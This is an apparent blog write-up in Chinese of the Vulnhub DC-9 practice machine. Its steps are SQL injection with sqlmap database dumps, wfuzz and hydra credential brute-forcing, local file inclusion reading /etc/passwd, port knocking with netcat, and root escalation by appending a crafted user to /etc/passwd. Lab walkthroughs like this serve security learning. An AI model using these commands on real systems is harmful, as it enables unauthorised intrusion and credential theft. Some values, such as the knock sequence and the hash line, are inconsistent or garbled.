Vulnhub-DC 9

信息收集

arp-scan -l
image.png
发现192.168.119.155 IP 段
扫描端口 --服务
image.png
22 端口 — 80 端口
这里22端口有一个(filtered)过滤的保护
先针对80端口进行一个查看
这是一个员工详细表 -----那就是说可以查看员工信息
image.png
发现一个查询框和一个登录框
image.png image.png

1:查询框是否存在SQL注入呢
2:登录框是否可以弱口令暴力破解呢
** nikto -host 192.168.119.155 (web 漏洞扫描工具)**
image.png
发现了 /config.php: PHP Config file may contain database IDs and passwords.
说可能存在数据库ID账号密码
。。 一片空白没有啥 —下面还有一个网页
这像是一个文件包含文件上传啊
还有几个网页也都没有什么信息
image.png
返回 页面

SQl注入

测试能否存在SQl注入
1’or’1’=‘1
’ or 1=1 #
image.pngimage.png
存在SQL注入
是POST传参的方式
image.png
使用SQlmap 工具 查询
sqlmap -u "http://192.168.119.155/results.php" --data=“search=1”
扫出来了 大概率使用mysql注入的
image.png
基于时间的盲注
组合注入
image.png
sqlmap -u "http://192.168.119.155/results.php" --data=“search=1” --dbs
image.png
有三个数据库
这个肯定得先看users 数据库
sqlmap -u "http://192.168.119.155/results.php" --data=“search=1” -D users --tables
有一个数据表UserDetails
image.png
sqlmap -u "http://192.168.119.155/results.php" --data=“search=1” -D users -T UserDetails --dump
一个用户表 —尝试登录一下
image.png
发现用户密码尝试一下暴力破解
把用户和密码添加到一个字典
使用FUZZ
wfuzz -z file,user_dict.txt -z file,passwd_dict.txt -d “username=FUZZ&password=FUZ2Z” http://192.168.119.155/manage.php
image.png
过滤一下
wfuzz --hw 93 -z file,user_dict.txt -z file,passwd_dict.txt -d “username=FUZZ&password=FUZ2Z” http://192.168.119.155/manage.php
image.png
结果都没有 那再测试一下另外一个数据库

sqlmap -u "http://192.168.119.155/results.php" --data=“search=1” -D Staff --tables
这里也有一个users 数据表查看一下 这个里面是不是会才是对的image.png
sqlmap -u "http://192.168.119.155/results.php" --data=“search=1” -D Staff -T Users --dump
扫出来了一个账号密码 是一个md5 加密的
密码已经哈希碰撞出来了 (transorbital1)
image.png
登录一下
结果登录成功了
image.png
本来打算在Add Record 添加一句话试一下 好像不行

本地文件包含

**File does not exis file很有可能存在文件包含 **
wfuzz 测试一下
wfuzz -b ‘PHPSESSID=j8d0k7trk2maekqj955j4d3fn5’ -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.119.155/manage.php?FUZZ=…/…/…/…/…/etc/passwd
image.png
wfuzz --hw 100 -b ‘PHPSESSID=j8d0k7trk2maekqj955j4d3fn5’ -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.119.155/manage.php?FUZZ=…/…/…/…/…/etc/passwd
存在file 文件包含
image.png
访问一下 ------果然是存在本地文件包含的

Hydra字典爆破连接

image.png
这是一个系统的用户和之前的第一个users 相似 尝试一下破解
ssh 使用字典连接
出现错误 是因为开头就说了他好像带有过滤
使用了端口敲门服务
Port Knocking
原理简单分析:
端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。
image.png
在/etc/knockd 配置文件
image.png
访问
image.png
必须要敲7469,8547,9842
可以使用nmap -p
for x in 7469 8475 9842 22 ;do nc 192.168.119.155 $x;done
image.png
再次尝试
hydra -L user_dict.txt -P passwd_dict.txt 192.168.119.155 ssh
有三个shh用户可以连接
image.png
连接一下 —登录成功
image.png

隐藏文件

ls -a 查看隐藏的文件
只有 janitor 用户有一个可疑的隐藏文件 --其他都没有
image.png
有一个密码文件
image.png
发现了这个密码 猜想是不是还有其他的用户刚才的密码不匹配把这个几个密码加上试一下
发现一个新的用户尝试登录

添加用户提权

image.png
image.png
sudo -l 查看那些文件是使用root权限可执行的
真的有
可以看到fredf可以不用密码以root权限执行/opt/devstuff/dist/test/test的文件
image.png
进入opt/devstuff/dist/test 发现是python文件
查找一下python 可执行文件
find / -name “test.py” 2>/dev/null
image.png
找到一个test.py 在/opt/devstuff
查看源码
image.png
fredf 用户可以用root的身份去执行test程序
test可以读取任意文本内容 ,追加到任意文本里面
这里直接添加一个管理员文本,添加到/etc/passwd文件里面去)
openssl 加密
image.png
写入/tmp目录下
echo ‘aaaa: 1 1 1aaaa$6q.rdPNbxQRHQa/Hb6h0B1:0:0:root:/root:/bin/bash’ >> /tmp/passwd
image.png
提权成功
image.png

  • 28
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值